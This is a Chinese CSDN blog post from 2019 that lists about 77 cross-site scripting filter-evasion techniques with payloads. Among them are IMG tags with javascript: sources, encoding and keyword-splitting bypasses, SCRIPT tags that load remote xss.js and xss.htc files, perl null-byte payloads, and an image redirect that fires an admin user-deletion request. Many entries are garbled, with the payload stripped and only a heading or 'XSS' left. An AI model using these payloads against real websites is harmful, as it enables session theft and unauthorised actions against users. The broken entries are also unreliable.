普通的XSS脚本写法

于 2019-05-22 17:16:16 发布
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kclax/article/details/90447927
本文详细列举了多种XSS跨站脚本攻击的实现方式,包括JavaScript注入、IMG标签利用、编码绕过等,展示了XSS攻击的多样性和复杂性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1)普通的XSS JavaScript注入

(2)IMG标签XSS使用JavaScript命令

(3)IMG标签无分号无引号

(4)IMG标签大小写不敏感

(5)HTML编码(必须有分号)

(6)修正缺陷IMG标签
<IMG “”">”>

(7)formCharCode标签(计算器)

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav…省略…S’)>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav…省略…S’)>

(10)十六进制编码也是没有分号(计算器)

(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

(16)解决限制字符(要求同页面)

(17)空字符
perl -e ‘print “”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”>

(21)Non-alpha-non-digit XSS to 2

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”>

(23)双开括号
<

(24)无结束脚本标记(仅火狐等浏览器)

(29)换码过滤的JavaScript
\”;alert(‘XSS’);//

(30)结束Title标签

(31)Input Image

(32)BODY Image

(33)BODY标签
<BODY(‘XSS’)>

(34)IMG Dynsrc

(35)IMG Lowsrc

(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)

  • XSS

(40)IMG VBscript

  • XSS

(41)META链接url

(42)Iframe

(43)Frame

(44)Table

(45)TD

(46)DIV background-image

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)

(48)DIV expression

(49)STYLE属性分拆表达

(50)匿名STYLE(组成:开角号和一个字母开头)

(51)STYLE background-image

(52)IMG STYLE方式
exppression(alert(“XSS”))’>

(53)STYLE background

(54)BASE

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> XSS

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用

(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤

(62)

(63)

(64)

(65)

(66)

(67)

(68)URL绕行
XSS

(69)URL编码
XSS

(70)IP十进制
XSS

(71)IP十六进制
XSS

(72)IP八进制
XSS

(73)混合编码
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS

(74)节省[http:]
XSS

(75)节省[www]
XSS

(76)绝对点绝对DNS
XSS

(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS

Coisini、
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值